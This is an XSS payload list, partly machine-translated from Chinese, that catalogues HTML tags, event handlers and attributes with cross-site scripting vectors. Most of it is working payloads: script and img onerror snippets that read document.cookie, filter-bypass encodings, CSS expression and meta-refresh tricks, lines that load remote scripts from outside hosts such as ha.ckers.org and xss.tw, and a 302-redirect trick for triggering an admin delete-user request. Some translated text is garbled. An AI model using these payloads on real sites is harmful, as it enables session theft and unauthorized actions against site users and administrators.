Labels, events, properties

The following shows can perform XSS label, events, properties

label

<script>  <a>  <p>  <img> 

<body>  <button>  <var>  <div> <style>

<iframe>  <object>  <input>  <select> 

<textarea>  <keygen>  <frameset>  <embed> 

<svg>  <math>  <video>  <audio> 

<link>  <table>

Event (event)

Events are beginning onXxx

onload  onerror  onunload  onchange  onsubmit

onreset  onselect  onblur  onfocus

onabort  onkeydown  onkeypress  onkeyup 

onclick  ondbclick  onmouseover  onmousemove 

onmouseout  onmouseup  onforminput  onformchange 

ondrag  ondrop

Attributes

formaction  action  href 

xlink:href  autofocus  src

content  data expression

HTML Code Injection

script tag

<script>document.write(String.fromCharCode(在这里写上你的代码));</script>   //过滤了等号、单引号、双引号、空格的绕过方法

><script>alert(document.cookie)</script>

</script><script>alert(doucument.cookie)</script>

<script firefox>alert(1)</script>  //其实我们并不需要一个规范的script标签 

<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script> 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>//在这里我们依然可以使用那些编码 
<script>prompt(-[])</script> //不只是alert。prompt和confirm也可以弹窗 
<script>alert(/3/)</script> //可以用"/"来代替单引号和双引号 
<script>alert(String.fromCharCode(49))</script> //我们还可以用char 
<script>alert(/7/.source)</script> // ".source"不会影响alert(7)的执行 
<script>setTimeout('alert(1)',0)</script> //如果输出是在setTimeout里，我们依然可以直接执行alert(1)


<SCRIPT SRC=//3w.org/XSS/xss.js> //无结束脚本标记
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; //无结束脚本标记(仅火狐等浏览器)

a label

<a href=java&#97;script:alert(document.cookie)>href</a>
<svg><a xlink:href="javascript:alert(1234)"><rect width="1000" height="1000" fill="white"/></a></svg>

img tag + onerror (js are invoked by event)

<img src=# onerror="alert(document.cookie)"/>
<img src=x onerror=alert(1)> 
<img src ?itworksonchrome?\/onerror = alert(1)>  //只在chrome下有效 
<img src=x onerror=window.open('http://google.com');> 
<img/src/onerror=alert(1)>  //只在chrome下有效 
<img src="x:kcf" onerror="alert(1)">

//IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">

//IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

button label

There should be some people for js call button labels still remain in the event achieved by the event. Like the following example:

<button/onclick=alert(1) >M</button>

So if all on (event) is filtered, we have no way yet? In fact, html5 has given us a new position:

<form><button formaction=javascript&colon;alert(1)>M

Maybe someone will see here Tucao, this requires user interaction ah! If you use the onfocus event, coupled with autofocus we can achieve automatic popups, without the interaction.

<button onfocus=alert(1) autofocus>

p tags + onmouseover event (js are invoked by event)

<p/onmouseover=javascript:alert(1); >M</p>
<p onmouseover=alert(/insight-labs/)>insight-labs、<frameset onload=alert(/insight-labs/)>、<body onload=alert(/insight-labs/)>

body label + onload (js are invoked by event)

<body onload=alert(/insight-labs/)>
<BODY BACKGROUND="javascript:alert(XSS)">
<body onload=alert(1)> 
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

var label

<var onmouseover="prompt(1)">KCF</var>

input label + properties / events

<INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
<input onfocus=javascript:alert(1) autofocus> 
<input onblur=javascript:alert(1) autofocus><input autofocus>

link tags

<LINK REL="stylesheet" HREF="javascript:alert(XSS);">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

object labels

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>

meta-Protocol Label

META协议
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">

frameset tags

<frameset onload=alert(/insight-labs/)>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<FRAMESET><FRAME src=javascript:alert('XpSS')></FRAME></FRAMESET>

table label

<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

CSS code injection div, style attributes tag + expression

<STYLE>
    .testcss{
        color: expreseion(alert(1))
    }
</STYLE>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<style>body {background-image: url("javascript:alert(123)");}</style>
<STYLE>@importjavasc ipt:alert("XSS");</STYLE>
<STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>
C<STYLE TYPE="text/javascript">alert(XSS);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(XSS)");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>

<div style="background-image:url(javascript:alert(123))">
<DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
<DIV STYLE="width: expression(alert(XSS));">

onclick attribute

<L onclick=alert(document.cookie)>click me</L★最琀;弹出1

DOM type injection iframe tags

js onload execution

<iframe onload="alert(1)"></iframe>

src javascript code execution

<iframe src="javascript:alert(1)"></iframe>

The IE code execution vbscript

<iframe src="vbscript:msgbox(1)"></iframe>

the data protocol code execution Chrome

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

?url=<iframe
src=JavaScript:(prompt)(document.domain)>a://目标url<a>

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

Chrome under srcdoc property

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

JS code injection, meaning no <>

?query%5Border_No%5D=&query%5Bm
obile%5D=%27%2balert`1`%2b%27

?query[order_No]=&query[m
obile]='+alert`1`+'

Way to bypass the filter

Turn coding, binary, hybrid coding

&lt;script&nbsp;src=//xss.tw/3058&gt;&lt;/script&gt;
&quot;  引号
&nbsp;  空格
&lt;    <
&gt;    >

Case
Nested

Instead of spaces

<img/src=x onerror=alert(1)>

<M/onclick="alert(1)">M

The shortest xss 20 characters

<b/ondrag=alert()>M

You can try the label

// US_ASCII编码（库尔特发现）。使用7位ascii编码代替8位，可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互
?scriptualert(EXSSE)?/scriptu

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(XSS);">]]>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(XSS)>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

flash injected embed tag

embed tag may be embedded FLASH, which incorporate XSS;

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed> //chrome 
<embed src=javascript:alert(1)> //firefox

<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

.swf

Code: a="get";
b="URL("";
c="javascript:";
d="alert(XSS);")";
eval(a+b+c+d);

reference

https://www.leavesongs.com/PENETRATION/xss-collect.html

XSS Payload List